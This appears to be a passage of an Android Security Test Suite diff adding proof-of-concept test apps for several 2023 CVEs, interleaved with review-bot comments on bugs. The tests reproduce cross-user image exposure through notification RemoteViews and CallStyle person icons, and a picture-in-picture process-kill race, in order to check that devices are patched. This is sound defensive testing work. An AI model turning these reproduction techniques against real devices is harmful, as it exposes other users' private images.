+ fileOutputStream.close();
+ imageIsReady.complete(true);
+ } catch (Exception ignore) {
+ imageIsReady.complete(false);
+ }
+ });
+
+ // Wait until image gets created successfully
+ assumeTrue(
+ context.getString(R.string.fileNotCreated),
+ imageIsReady.get() && getImageFile(context).exists());
+
+ return () -> {
+ File imageFile = getImageFile(context);
+ if (imageFile.exists()) {
+ imageFile.delete();
+ }
+ };
+ }
+
+ private File getImageFile(Context context) {
+ return Environment.buildPath(
+ Environment.getExternalStorageDirectory(),
+ Environment.DIRECTORY_DOWNLOADS,
+ context.getString(R.string.imageFile));
+ }
+}
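Review bot: In withTemporaryImage, `imageIsReady.get()` has no timeout, and the worker completes the future only on success or on an `Exception`. A 13000 x 17000 ARGB_8888 bitmap needs roughly 884 MB of pixel memory, so `Bitmap.createBitmap` may throw OutOfMemoryError on low-memory devices; `catch (Exception ignore)` does not cover that, so the `fileNotCreated` assumption is never reached. I would use `} catch (Throwable ignore) {` in the worker and a bounded wait such as `imageIsReady.get(30_000L, TimeUnit.MILLISECONDS)` (the timeout value is illustrative). The test also leaves state behind: the receiver is never unregistered, notification 0 is never cancelled and the HandlerThread is never quit. The missing cancel applies to the CVE_2023_21238 and CVE_2023_21239 DeviceTest hunks as well.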
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java
new file mode 100644
index 0000000..77508a6
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21144;
+
+import android.content.Intent;
+import android.service.notification.NotificationListenerService;
+import android.service.notification.StatusBarNotification;
+
+public class PocListenerService extends NotificationListenerService {
+
+ @Override
+ public void onNotificationPosted(StatusBarNotification sbn) {
+ try {
+ // Send broadcast when notification is posted
+ sendBroadcast(new Intent(getString(R.string.broadcastAction)));
+ } catch (Exception ignore) {
+ // Ignore as it causes assumptionFailure in DeviceTest
+ }
+ }
+}
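Review bot: onNotificationPosted sends the broadcast for every notification the listener sees, so a notification from any other package can release the semaphore in DeviceTest before the test's own notification is posted. Checking the source first, e.g. `if (!getPackageName().equals(sbn.getPackageName())) return;`, ties the signal to the notification under test. This assumes the listener and the test share one application package, which the manifest outside this hunk would confirm. The intent is also implicit; adding `.setPackage(getPackageName())` to it would keep the broadcast inside the test app.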
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp
new file mode 100644
index 0000000..bb5bd8a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21145",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml
new file mode 100644
index 0000000..c0be6bd
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21145">
+
+ <application>
+ <activity
+ android:name=".PipActivity"
+ android:exported="true"
+ android:supportsPictureInPicture="true"
+ android:process=":pipActivity" />
+
+ <activity android:name=".PocActivity"
+ android:taskAffinity="taskAffinity.cve_2023_21145" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java
new file mode 100644
index 0000000..65d2aff
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts.CVE_2023_21145;
+
+import android.app.Activity;
+import android.app.PictureInPictureParams;
+import android.content.Intent;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.os.Process;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+public class PipActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+
+ // Start PocActivity
+ startActivity(new Intent(this, PocActivity.class).setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Create HandlerThread and post the Runnable tasks
+ HandlerThread handlerThread = new HandlerThread(getPackageName());
+ handlerThread.start();
+ Handler handler = new Handler(handlerThread.getLooper());
+
+ // Enter into pip mode after 2000 ms delay
+ final long timeout = 2_000L;
+ handler.postDelayed(
+ () -> enterPictureInPictureMode(new PictureInPictureParams.Builder().build()),
+ timeout);
+
+ // Kill current process after 2000 ms delay of entering pip mode
+ Semaphore releaseOnResume = new Semaphore(0);
+ handler.postDelayed(
+ () -> {
+ Process.killProcess(Process.myTid());
+ releaseOnResume.release();
+ },
+ timeout * 2);
+
+ // To hold the process in onResume until the process dies.
+ try {
+ releaseOnResume.tryAcquire(10_000L /* timeout */, TimeUnit.MILLISECONDS);
+ } catch (InterruptedException ignore) {
+ // Ignore
+ }
+ }
+}
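Review bot: `Process.killProcess(Process.myTid())` in the second delayed runnable passes a thread id where the API takes a process id. The runnable runs on the HandlerThread, so `myTid()` is that worker's id rather than the pid of the `:pipActivity` process. Whether the signal still takes down the whole process depends on kernel behaviour that the hunk does not show, so `Process.killProcess(Process.myPid());` states the intent directly. The `releaseOnResume.release()` after it only runs if the kill did not take effect, which deserves a short comment such as `// Reached only if the kill failed; unblocks onResume`.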
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
similarity index 80%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
index 4416990..b160ee5 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21145;
import android.app.Activity;
-public class PocActivity extends Activity {
-}
+public class PocActivity extends Activity {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp
new file mode 100644
index 0000000..949556b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21238",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml
new file mode 100644
index 0000000..6c0315e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21238">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21238" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml
new file mode 100644
index 0000000..555c9f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21238_img"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java
new file mode 100644
index 0000000..d8090d0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java
@@ -0,0 +1,144 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21238;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ UiAutomation uiAutomation, String permission) {
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testPocCVE_2023_21238() {
+ UiDevice uiDevice = null;
+ try {
+ final String cveId = "cve_2023_21238_";
+ final String title = cveId + "title";
+
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ int userId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+ for (UserInfo info : list) {
+ if (info.name.contains(cveId)) {
+ userId = info.id;
+ break;
+ }
+ }
+ }
+ assumeTrue(userId != -1);
+
+ // Post a notification with a content view containing image from other user
+ RemoteViews rvPortrait =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21238_layout);
+ rvPortrait.setImageViewUri(
+ R.id.cve_2023_21238_img,
+ ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, userId));
+ NotificationChannel notificationChannel =
+ new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+ RemoteViews rvOuter = new RemoteViews(rvPortrait, rvPortrait);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+ Notification notification =
+ new Notification.Builder(context, cveId)
+ .setContentTitle(title)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .setCustomContentView(rvOuter)
+ .setCustomBigContentView(rvOuter)
+ .build();
+ try {
+ notificationManager.notify(0 /* id */, notification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Open notification shade
+ assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+ // Wait for notification to appear and detect if the remote view is present
+ uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+ UiObject2 exposedImg =
+ uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+ assertNull(
+ "Device is vulnerable to b/277740848, Other user's images can be exposed in"
+ + " notifications using remote views",
+ exposedImg);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
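Review bot: The result of `uiDevice.wait(Until.hasObject(By.text(title)), 3000)` is discarded, so if the notification is not rendered within three seconds `findObject` returns null and `assertNull` passes; a vulnerable device would then be reported as fixed. Gating the check on the wait, e.g. `assumeTrue(uiDevice.wait(Until.hasObject(By.text(title)), 3000));`, turns that case into a skip instead of a pass. That only works if the title is actually drawn when a custom content view is set, which the hunk does not show. In the SecurityException branch, `getLocalizedMessage()` may be null and `toLowerCase()` is locale-dependent; a null check and `toLowerCase(Locale.ROOT)` would be more robust. The same pattern appears in the CVE_2023_21239 DeviceTest hunk.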
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp
new file mode 100644
index 0000000..4a33f83
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21239",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "sts-device-util",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml
new file mode 100644
index 0000000..b8fcfe3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21239">
+
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <uses-permission android:name="android.permission.USE_FULL_SCREEN_INTENT" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21239" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java
new file mode 100644
index 0000000..f56a217
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java
@@ -0,0 +1,185 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21239;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.PendingIntent;
+import android.app.Person;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.UserInfo;
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserHandle;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.service.notification.StatusBarNotification;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ Instrumentation mInstrumentation;
+
+ private AutoCloseable withAdoptShellPermissionIdentity(String permission) {
+ UiAutomation uiAutomation = mInstrumentation.getUiAutomation();
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testCallStyleNotification() {
+ try {
+ mInstrumentation = getInstrumentation();
+ Context context = mInstrumentation.getContext();
+ int testUserId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list =
+ context.getSystemService(UserManager.class).getUsers(true);
+ for (UserInfo info : list) {
+ if (info.toString().contains("cve_2023_21239_user" /* testUser name */)) {
+ testUserId = info.getUserHandle().getIdentifier();
+ break;
+ }
+ }
+ }
+ assumeTrue(testUserId != -1);
+
+ // Create a pending intent for notification
+ Intent intent = new Intent();
+ PendingIntent pendingIntent =
+ PendingIntent.getActivity(
+ context, 0 /* request code */, intent, PendingIntent.FLAG_MUTABLE);
+
+ // Retrieve contentUri with userId
+ Uri contentUriWithUser =
+ ContentProvider.createContentUriForUser(
+ MediaStore.Images.Media.EXTERNAL_CONTENT_URI,
+ UserHandle.of(testUserId));
+
+ // Create personIcon using URI to access the media from cve_2023_21239_User
+ Icon personIcon = Icon.createWithContentUri(contentUriWithUser);
+
+ // Create person
+ Person person =
+ new Person.Builder()
+ .setName("cve_2023_21239_person" /* person name */)
+ .setIcon(personIcon)
+ .setImportant(true /* high priority */)
+ .build();
+
+ // Create style so that the notification created is callStyle
+ Notification.CallStyle style =
+ Notification.CallStyle.forOngoingCall(person, pendingIntent);
+
+ // Create smallIcon for notification
+ Bitmap testBitmap =
+ Bitmap.createBitmap(30 /* width */, 30 /* height */, Bitmap.Config.ARGB_8888);
+ final Canvas canvas = new Canvas(testBitmap);
+ canvas.drawColor(Color.BLUE);
+ Icon notificationIcon = Icon.createWithBitmap(testBitmap);
+
+ // Set notification channel id
+ String notificationChannelId = "notification_channel_id";
+
+ // Create notification
+ Notification callNotification =
+ new Notification.Builder(context, notificationChannelId)
+ .setStyle(style)
+ .setCategory(Notification.CATEGORY_CALL)
+ .setSmallIcon(notificationIcon)
+ .setContentIntent(pendingIntent)
+ .setFullScreenIntent(pendingIntent, true /* high priority */)
+ .build();
+
+ // Create a notification channel
+ NotificationChannel notificationChannel =
+ new NotificationChannel(
+ notificationChannelId,
+ "cve_2023_21239_notification_channel" /* notification channel name */,
+ NotificationManager.IMPORTANCE_HIGH);
+
+ // Post the notification
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+
+ // Check if any security exception is caught
+ int notificationId = 0;
+ try {
+ notificationManager.notify(notificationId, callNotification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Check if notification gets posted or not, fail the test if notification gets posted
+ assertFalse(
+ "Device is vulnerable to b/274592467 hence images belonging to another user on"
+ + " the same device can be displayed in CallStyle notifications",
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ notificationManager.getActiveNotifications();
+ for (StatusBarNotification notification : activeNotifications) {
+ if (notification.getId() == notificationId
+ && notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
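Review bot: The PendingIntent in testCallStyleNotification is created with `PendingIntent.FLAG_MUTABLE` around an empty `new Intent()`, and nothing visible in the test fills it in afterwards. Unless the reproduction depends on mutability, `PendingIntent.FLAG_IMMUTABLE` is the safer default and should also avoid newer platform restrictions on mutable implicit intents. The user lookup matches on `info.toString().contains("cve_2023_21239_user")`, whereas the CVE_2023_21238 test compares `info.name`. Matching the name field directly does not depend on the `toString()` format.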
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp
new file mode 100644
index 0000000..10d9d77
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21244",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml
new file mode 100644
index 0000000..b30febc
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21244">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21244" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java
new file mode 100644
index 0000000..774aa78
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java
@@ -0,0 +1,170 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
